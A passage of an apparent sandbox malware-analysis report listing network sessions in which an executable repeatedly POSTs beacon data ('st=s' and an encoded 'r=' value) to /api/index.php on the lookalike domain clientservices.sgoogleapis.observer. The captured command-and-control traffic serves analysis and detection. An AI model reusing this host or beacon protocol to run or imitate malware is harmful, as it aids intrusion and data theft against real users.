              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2Bpl6WE9mlRO3KiYFCA7YIfAMOdvwaNl25KnNNtyYMEYKYre3urI%2BZruQ%2BxJsmhoy3gz4oZ36jbcfe%2Bak2P6ZbqfNbMXWgfizZn7tE3m5s2na3qg3G5pBX%2BXOcGqP6rZ%2FoDtfP0ZL2TAU01o%2BHND5p8V%2BwUKaA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9177cadf43ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1688&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.550017104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:30.155406952 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:30.788145065 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:30 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVxOlzQ2glaWfHqwjpZl5U7QSV2rKtzw9Jl4T%2FkIHXfDUf66vtbVjP%2FUKzVxTN2rCGzGBRunThBjG9uZHnR3qbuw%2BY6pvg2i0i%2BFfXsQWmcJq0aHP3VW5ASuglvhMq3RM97bPD3n7OmtNiQTJSL%2FSBxtFMr%2FTA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91860a9d42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.550018104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:32.409204006 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:33.060673952 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:33 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FkNYbqHhiTRPuYLLwnbknER85kVI3jw6IohLF6CLMEGKi4R9LWD6NaTyI472J%2B1JVDYS8U1PUP4sy9ntgEz3dBXbp3x4nmRrEPTu3AOMbL0MAeHMclO4jPOY0JmOo4zbcz%2FOu2bXp75cEIJhYUSZFEazelwaA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91942d6d7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1916&rtt_var=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.550019104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:34.686187029 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:35.310575962 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:35 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dmlf8FCPM%2BD57Y6bYhVsUAL6oZEQRxJ4ICPu2%2BaEcdLhNyOKlGlBN26aGP4afRrda30esuuo7MYSYNY7NA0EXz6oHrVazglA8nFUrylpvZoTdY5oK8nil3QJKMQige8EJYF4XCggMvFIdRQfdw7uxexIFnx%2FNg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91a24a1b42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.550020104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:36.827311039 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:37.467489004 CET831INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:37 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkATLPUL7SX5N2KI2Mnf6YceKVkzH7UOCfaxZxm0wHx9vG0kzZJp%2F9XeF3Afe0xx%2F3MzYvJzeEr0F4L5HyYjxQC%2B2X%2BWj4Qzpg7DpSEoMdguQ6mN0LcL2VhSo%2Ff5Rz%2BJZGNZ1bGUXpMyJZv9mDJ9Z5cysa%2B%2F9g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91afbd1b0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1440&min_rtt=1440&rtt_var=720&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.550021104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:39.191734076 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:39.845268011 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:39 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t143zRmyZlM0plOv6JfnsTR%2B%2BzOnQyPJYxDixWRpC1vnzEgrBOSzGnxwiJucYDV6tGJP2C1Iv441vSiDgB38hDfQQ%2BZUhEePBp55NZYzT2j5B2qhsAa%2Fsts%2F9Yiqg1vWM8gUz3jWp%2FPprXv87K53pQIQMmXEvA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91be9b5f0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1448&rtt_var=724&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.550022104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:41.364422083 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:42.000072002 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9Fb3fB%2BmPWsZzSELWH9ZIqj22hgf0elIG6hW96tGmmmUCy%2FVXakbOVshAvNix7eVRereGf4HdfajBIq4rGo6N2XToTuURB16AlWxUoqXNZic2aIXomhZznpVSkEURF1cUM3pKYkksGQTePR7Ur%2Bpqa1nE%2FX2A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91cc093f42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.550023104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:43.744420052 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:44.373550892 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:44 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tr21aJtxYr56ksQdk0lvXjjB4FgpIeqV3mANv0MIHHUN8i%2FEN9eFttR3w6BzVw1s7Y01uRqXAPcEhL7jvSsx01DzHs4pOVWdKLRdJc96qYy%2BjmuhtYnIGKPjVKiOVWi3aKsl6TCOZS1wCPKvnW91PJNk9c51Ww%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91daebae8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.550024104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:45.888672113 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:46.523636103 CET829INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:46 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W359lkpTQDPiM5UCNW9c3t2ezkaaZLMyD3SHHt757us2QqpAlRgzXmZ89Cu38V878fFnm8PK0AQIQQBhv1Yy2YiWJg%2FMxkp6DC%2FuEKhHHx%2F3%2BLJZ0KT9GdyZG6tyC9UBIYqlcKo33rbzmySgo2c%2FgfMW%2FF%2BAvg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91e849a643ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.550025104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:48.159876108 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:48.783965111 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:48 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QUNnaDTcfVqvZJnzi1bmsHxLRjHpfLldOPbKa92KN0as1O4INXAkAcV%2BqamofFvhR6QbQvZPPYUr%2Bne8GCUNyt1k7xHlVC0wK8%2B7OPWsWz7pLnT2%2FxsiczMC4m63wBLVuJyK%2FC%2BhAgadXXuFgnU638U81gVNw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea91f6792642d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1560&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.550026104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:50.301374912 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:50.845326900 CET834INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:50 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGZrOk3LZ3Ul7AD4CkMyFkgQTjoFVr4Ns%2B6%2FIzWFZGlJQzVmqGEEAweCGJ%2BLEiqgZS3k8%2FmNMHQqfPKtxBvxVesQ2zuchIgewRWI6JKJZCrHdCxk7TePu9s%2FiE7%2BxC5wivTIOx%2BzjHoso%2BP%2BCDfQl0BWIm1Lqw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9203db6f8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.550027104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:52.577013016 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:53.222126007 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:53 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=glnr9%2FzVxIkRwOVjxCcRzfd8BDSdWCfhS3iLNWuG%2BO40nFMyVewhl8VCGpARjFqn1ddLmaIezYBDUuEhiVU68glgyPsQt94EwYrSW3yLIwiMWjMJ9YEZdHuExjnl7v52ypaqK0GoMPrqap49wbfczvrHDqYOXA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92123be743ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.550028104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:54.733674049 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:55.378366947 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:55 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NoJ1QCX449FL6txT2B47Rw8Zi6zjcE8ztBIgY0f3uG9PJSD%2FKz68bxatwOgXmXMFimtmRsZ46EZCJ6j%2B%2FemrzDceetPT7JtZv070iQbOQ2ll3NfgJbKu9MRc9B5MmdDPn5IjXyhEusBzSrrzpj3R5mWT1UkbGw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea921faabe0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1463&rtt_var=731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.550029104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:57.014543056 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:45:57.640372038 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:57 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oT0oKfvNFKOFoB9tZ65paP6izMhLwrTwVUGRo1EXFKfXPQ2CCgZNhk%2B8HTkDepSpByW1ZyyGXSPUeVHBX5LG8p%2F%2BIkd3S7VMNsRK7YF4JRkfSiWRLPpc5qS3Vqarbe3LGpviCD0GXOpkSMb%2BrmHdT0olzGJgXw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea922dde5342d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1534&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.550030104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:45:59.392281055 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:45:59.761519909 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:45:59 GMT
